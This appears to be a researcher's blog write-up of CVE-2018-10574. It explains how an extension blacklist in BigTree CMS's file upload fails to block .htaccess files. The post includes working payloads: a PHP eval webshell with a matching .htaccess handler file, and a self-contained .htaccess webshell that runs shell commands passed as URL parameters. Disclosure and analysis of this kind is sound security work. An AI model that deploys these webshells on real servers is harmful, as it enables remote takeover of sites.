Code Audit – CVE-2018-10574

As the second CVE ID I have owned, CVE-2018-10574 identifies an arbitrary code executation in BigTree CMS developed by Fastspot. Here are some places to get more details about this CVE.

Here I would love to share how I found this vulnerability and exploit it to get the webshell to compromise the whole system. The score under the CVSS v3.0 for this vulnerability is 9.8, meaning the vulnerability is regarded as critical one. 

I found that vulnerability by code audit. 

At first beginning, I was trying to find some SQL injection vulnerabilities. I looked into how parameters are prepared, and check if all parameters from clients are handled. I searched some keywords like $_GET[] ,$_POST[] , and  $_REQUEST , hoping to find incompleted handling. Disappointedly, no result did I get. Then, I started to go through other components.

After auditing several parts of the project, I find a place used for uploading files. The code was written like this.

In /core/admin/ajax/file-browser/upload.php , I got this.

$storage = new BigTreeStorage;

I looked into the definition of the class BigTreeStorage, and got this.

class BigTreeStorage {

    var $AutoJPEG = false;
    var $DisabledFileError = false;
    var $DisabledExtensionRegEx = '/\\.(exe|com|bat|php|rb|py|cgi|pl|sh|asp|aspx|phtml|pht)/i';
    var $Service = "";
    var $Cloud = false;
    var $Settings;
......
......
    function store($local_file,$file_name,$relative_path,$remove_original = true,$prefixes = array()) {
        // Make sure there are no path exploits
        $file_name = BigTree::cleanFile($file_name);

        // If the file name ends in a disabled extension, fail.
        if (preg_match($this->DisabledExtensionRegEx, $file_name)) {
            $this->DisabledFileError = true;
            unlink($local_file);
            return false;
                    }

 

As we can see, the function preg_match  is used to deny uploading files with the name inside which some keywords are. It is a filter for file extension. Since files with the extension of php, phtml, pht  are forbidden to store in the system, it seems such measure of using white list works good. However, the programmers forget some things.

.htaccess files (or “distributed configuration files”) provide a way to make configuration changes on a per-directory basis. A file, containing one or more configuration directives, is placed in a particular document directory, and the directives apply to that directory, and all subdirectories thereof.

Since the Apache server support .htaccess , and there is no restriction for this type of files, you can upload a .htaccess  file to modify the configuration so that the PHP intepreter will execute code as PHP codes wherever they are. This is a commonly-seen trick in CTF games.

Now, what you need is to upload a customized .htaccess  file and a webshell. Of course you can combine those two files into one.

Two Files

File 1: haozhe

<script language="php">eval($_GET['cmd']); phpinfo();</script>

File 2: .htaccess

<FilesMatch "haozhe."> # here is a dot in the filename.
	SetHandler application/x-httpd-php
</FilesMatch>

Then, the file haozhe.  will be regarded as PHP code file by PHP interpreter. In this way, you can execute arbitrary PHP code. Getshell!

One File

What you need to do is just to combine two files into one. Of course the file should be names as .htaccess . Then, what you need to do is to put PHP code inside this file. Then, getshell!

# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

Getshell

Leave a Reply

Your email address will not be published. Required fields are marked *